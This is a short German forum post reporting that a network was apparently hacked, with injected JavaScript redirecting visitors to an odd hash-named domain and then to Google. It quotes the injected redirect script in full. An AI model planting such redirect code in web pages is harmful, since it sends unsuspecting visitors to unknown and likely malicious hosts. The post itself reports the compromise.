Das Netzwerk wurde scheinbar gehackt. Zumindest wurden dort überall JavaScripte "eingeschleust" die den Besucher auf eine sehr merkwürdige Domain und anschließend auf google weiterleiten.

PHP-Code:
<script type='text/javascript'>document.location.href='http://84f6a4eef61784b33e4acbd32c8fdd72.com/'+Math.floor(Math.random()*10000);</script
Auch in den Kampagnen findet man das JavaScript als Paidlink oder Mailtext.